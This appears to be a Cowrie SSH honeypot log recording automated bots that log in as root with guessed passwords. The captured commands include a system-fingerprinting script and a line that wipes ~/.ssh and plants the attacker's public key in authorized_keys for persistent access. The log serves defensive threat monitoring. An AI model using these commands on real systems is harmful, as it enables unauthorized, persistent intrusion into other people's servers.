{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T06:14:17.860444Z","src_ip":"212.227.235.229","session":"ea2abf20eaf4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T06:14:17.861303Z","src_ip":"212.227.235.229","session":"ea2abf20eaf4"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T06:14:17.862346Z","src_ip":"212.227.235.229","session":"ea2abf20eaf4"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T06:14:17.863682Z","src_ip":"212.227.235.229","session":"ea2abf20eaf4"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T06:14:17.864322Z","src_ip":"212.227.235.229","session":"ea2abf20eaf4"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T06:14:17.865061Z","src_ip":"212.227.235.229","session":"ea2abf20eaf4"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T06:14:17.866379Z","src_ip":"212.227.235.229","session":"ea2abf20eaf4"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T06:14:17.866944Z","src_ip":"212.227.235.229","session":"ea2abf20eaf4"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T06:14:17.867515Z","src_ip":"212.227.235.229","session":"ea2abf20eaf4"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T06:14:17.868268Z","src_ip":"212.227.235.229","session":"ea2abf20eaf4"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T06:14:17.868942Z","src_ip":"212.227.235.229","session":"ea2abf20eaf4"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T06:14:17.869342Z","src_ip":"212.227.235.229","session":"ea2abf20eaf4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T06:14:18.076904Z","src_ip":"212.227.235.229","session":"ea2abf20eaf4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:18.077774Z","src_ip":"212.227.235.229","session":"ea2abf20eaf4"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:18.078755Z","src_ip":"212.227.235.229","session":"ea2abf20eaf4"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:18.336348Z","src_ip":"212.227.235.229","session":"f572768e7933"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53292,"dst_ip":"1.2.3.4","dst_port":22,"session":"901cb0c269f4","protocol":"ssh","message":"New connection: 212.227.235.229:53292 (1.2.3.4:22) [session: 901cb0c269f4]","sensor":"my-vps","timestamp":"2025-08-31T06:14:18.606699Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:14:18.607444Z","src_ip":"212.227.235.229","session":"901cb0c269f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:14:18.877502Z","src_ip":"212.227.235.229","session":"901cb0c269f4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:14:19.998439Z","src_ip":"212.227.235.229","session":"901cb0c269f4"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:20.268488Z","src_ip":"212.227.235.229","session":"e4be01ff660c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:20.270880Z","src_ip":"212.227.235.229","session":"901cb0c269f4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:14:26.263627Z","src_ip":"212.227.235.229","session":"4d69be370e8b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:14:26.264305Z","src_ip":"212.227.235.229","session":"4d69be370e8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43190,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d0b7599998f","protocol":"ssh","message":"New connection: 212.227.235.229:43190 (1.2.3.4:22) [session: 2d0b7599998f]","sensor":"my-vps","timestamp":"2025-08-31T06:14:27.813758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:14:27.814776Z","src_ip":"212.227.235.229","session":"2d0b7599998f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:14:28.096541Z","src_ip":"212.227.235.229","session":"2d0b7599998f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"2.7","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:28.952923Z","src_ip":"212.227.235.229","session":"4d69be370e8b"}
{"eventid":"cowrie.session.closed","duration":"61.5","message":"Connection lost after 61.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:29.074070Z","src_ip":"212.227.235.229","session":"4d69be370e8b"}
{"eventid":"cowrie.login.success","username":"root","password":"123!@#qwe","message":"login attempt [root/123!@#qwe] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:14:29.262032Z","src_ip":"212.227.235.229","session":"2d0b7599998f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:14:30.270177Z","src_ip":"212.227.235.229","session":"2d0b7599998f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:14:30.271021Z","src_ip":"212.227.235.229","session":"2d0b7599998f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:14:30.271768Z","src_ip":"212.227.235.229","session":"2d0b7599998f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:30.553792Z","src_ip":"212.227.235.229","session":"2d0b7599998f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:14:31.138368Z","src_ip":"212.227.235.229","session":"2d0b7599998f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:14:31.139157Z","src_ip":"212.227.235.229","session":"2d0b7599998f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:14:31.422704Z","src_ip":"212.227.235.229","session":"2d0b7599998f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:31.423662Z","src_ip":"212.227.235.229","session":"2d0b7599998f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44340,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7ead101acd1","protocol":"ssh","message":"New connection: 212.227.235.229:44340 (1.2.3.4:22) [session: a7ead101acd1]","sensor":"my-vps","timestamp":"2025-08-31T06:14:31.744391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:14:31.745083Z","src_ip":"212.227.235.229","session":"a7ead101acd1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:14:32.047354Z","src_ip":"212.227.235.229","session":"a7ead101acd1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56784,"dst_ip":"1.2.3.4","dst_port":22,"session":"34865339fa95","protocol":"ssh","message":"New connection: 212.227.125.160:56784 (1.2.3.4:22) [session: 34865339fa95]","sensor":"my-vps","timestamp":"2025-08-31T06:14:32.206378Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:14:33.297509Z","src_ip":"212.227.235.229","session":"a7ead101acd1"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:34.601544Z","src_ip":"212.227.235.229","session":"a7ead101acd1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45558,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a82695caf79","protocol":"ssh","message":"New connection: 212.227.235.229:45558 (1.2.3.4:22) [session: 7a82695caf79]","sensor":"my-vps","timestamp":"2025-08-31T06:14:34.861790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:14:34.862615Z","src_ip":"212.227.235.229","session":"7a82695caf79"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:14:35.144353Z","src_ip":"212.227.235.229","session":"7a82695caf79"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:14:36.278954Z","src_ip":"212.227.235.229","session":"7a82695caf79"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:36.562164Z","src_ip":"212.227.235.229","session":"2d0b7599998f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:14:36.563072Z","src_ip":"212.227.235.229","session":"7a82695caf79"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:14:40.034615Z","src_ip":"212.227.125.160","session":"34865339fa95"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:14:40.039027Z","src_ip":"212.227.125.160","session":"34865339fa95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45803,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd94ac375c49","protocol":"ssh","message":"New connection: 212.227.235.229:45803 (1.2.3.4:22) [session: dd94ac375c49]","sensor":"my-vps","timestamp":"2025-08-31T06:14:46.410932Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:14:46.411983Z","src_ip":"212.227.235.229","session":"dd94ac375c49"}
